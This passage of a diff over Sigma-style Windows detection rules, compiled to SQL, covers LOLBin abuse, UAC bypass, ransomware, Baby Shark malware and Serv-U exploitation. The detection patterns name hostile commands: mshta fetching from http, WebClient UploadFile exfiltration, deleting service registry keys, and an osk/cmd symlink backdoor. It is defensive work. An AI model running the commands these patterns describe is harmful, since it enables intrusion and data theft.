'\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" + "filename": "proc_creation_win_lolbin_dnx.yml" }, { - "title": "Suspicious Rundll32 Script in CommandLine", - "id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", - "status": "experimental", - "description": "Detects suspicious process related to rundll32 based on arguments", - "author": "frack113, Zaw Min Htun (ZETA)", + "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "status": "test", + "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, 
powershell, mshta...etc.", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Administrative scripts", + "Microsoft SCCM" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32%' ESCAPE '\\' AND (CommandLine LIKE '%mshtml,RunHTMLApplication%' ESCAPE '\\' OR CommandLine LIKE '%mshtml,#135%' ESCAPE '\\') AND (CommandLine LIKE '%javascript:%' ESCAPE '\\' OR CommandLine LIKE '%vbscript:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program 
Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_script_run.yml" + "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" }, { - "title": "Lolbin Runexehelper Use As Proxy", - "id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", - "status": "experimental", - "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", - "author": "frack113", + "title": "Potential Baby Shark Malware Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "test", + "description": "Detects activity that could be related to Baby Shark malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1012", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\runexehelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_runexehelper.yml" + "filename": "proc_creation_win_malware_babyshark.yml" }, { - "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", - "id": "2afafd61-6aae-4df4-baed-139fa1f4c345", + "title": "Suspicious Userinit 
Child Process", + "id": "b655a06a-31c0-477a-95c2-3726b83d649d", "status": "test", - "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", - "author": "Thomas Patzke", + "description": "Detects a suspicious child process of userinit", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "NTDS maintenance" + "Administrative scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%\\\\netlogon\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR OriginalFileName = 'explorer.exe')))" ], - "filename": "proc_creation_win_ntdsutil_usage.yml" + "filename": "proc_creation_win_susp_userinit_child.yml" }, { - "title": "Potential Snatch Ransomware Activity", - "id": "5325945e-f1f0-406e-97b8-65104d393fff", - "status": "stable", - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "title": "Visual Basic Command Line Compiler Usage", + "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "status": "test", + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.execution", - "attack.t1204" + "attack.defense_evasion", + "attack.t1027.004" ], "falsepositives": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + "Utilization of this tool should not be seen in enterprise 
environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\vbc.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cvtres.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_snatch_ransomware.yml" + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" }, { - "title": "UAC Bypass via Event Viewer", - "id": "be344333-921d-4c4d-8bb8-e584cf584780", + "title": "Suspicious Atbroker Execution", + "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "status": "test", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "author": "Mateusz Wydra, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate, non-default assistive technology applications execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE 
'%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr.yml" + "filename": "proc_creation_win_lolbin_susp_atbroker.yml" }, { - "title": "Audio Capture via SoundRecorder", - "id": "83865853-59aa-449e-9600-74b9d89a6d6e", - "status": "test", - "description": "Detect attacker collecting audio via SoundRecorder application.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Shell32 DLL Execution in Suspicious Directory", + "id": "32b96012-7892-429e-b26c-ac2bf46066ff", + "status": "experimental", + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1123" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate audio capture by legitimate user." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\SoundRecorder.exe' ESCAPE '\\' AND CommandLine LIKE '%/FILE%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_soundrecorder_audio_capture.yml" + "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" }, { - "title": "Application Whitelisting Bypass via Dxcap.exe", - "id": "60f16a96-db70-42eb-8f76-16763e333590", - "status": "test", - "description": "Detects execution of of Dxcap.exe", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "ShimCache Flush", + "id": "b0524451-19af-4efa-a46f-562a977f792e", + "status": "stable", + "description": "Detects actions that clear the local ShimCache and 
remove forensic evidence", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ - "Legitimate execution of dxcap.exe by legitimate user" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DXCap.exe' ESCAPE '\\' OR OriginalFileName = 'DXCap.exe') AND CommandLine LIKE '% -c %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_susp_dxcap.yml" + "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" }, { - "title": "Suspicious Add User to Remote Desktop Users Group", - "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", + "id": "e9b61244-893f-427c-b287-3e708f321c6b", "status": "experimental", - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". 
This technique provides an elevated command prompt to the user from the login screen without the need to log in.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" + "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" }, { - "title": "Service Registry Key Deleted Via Reg.EXE", - "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "title": "7Zip Compressing Dump Files", + "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. 
Often used by attacker to remove AV software services", + "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_delete_services.yml" + "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" }, { - "title": "Equation Group DLL_U Export Function Load", - "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", - "status": "stable", - "description": "Detects a specific export function name used by one of EquationGroup tools", + "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "id": "75578840-9526-4b2a-9462-af469a45e767", + "status": "test", + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.g0020", - "attack.defense_evasion", - "attack.t1218.011" + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" ], "falsepositives": [ "Unlikely" ], "level": 
"critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%-export dll\\_u%' ESCAPE '\\' OR (CommandLine LIKE '%,dll\\_u' ESCAPE '\\' OR CommandLine LIKE '% dll\\_u' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - Process", - "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "title": "Conti Volume Shadow Listing", + "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a command used by conti to find volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1587.001", + "attack.resource_development" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" + "filename": "proc_creation_win_malware_conti.yml" }, { - "title": "Potential 
Exploitation Attempt From Office Application", - "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "title": "Rorschach Ransomware Execution Activity", + "id": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68", "status": "experimental", - "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", - "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", + "description": "Detects Rorschach ransomware execution activity", + "author": "X__Junior (Nextron Systems)", "tags": [ "attack.execution", + "attack.t1059.003", + "attack.t1059.001", "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\') AND CommandLine LIKE '%11111111%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" + "filename": 
"proc_creation_win_malware_rorschach_ransomware_activity.yml" }, { - "title": "Php Inline Command Execution", - "id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", "status": "experimental", - "description": "Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a Windows program executable started from a suspicious folder", + "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Unknown" + "Exotic software" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR OriginalFileName = 'php.exe') AND CommandLine LIKE '% -r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR 
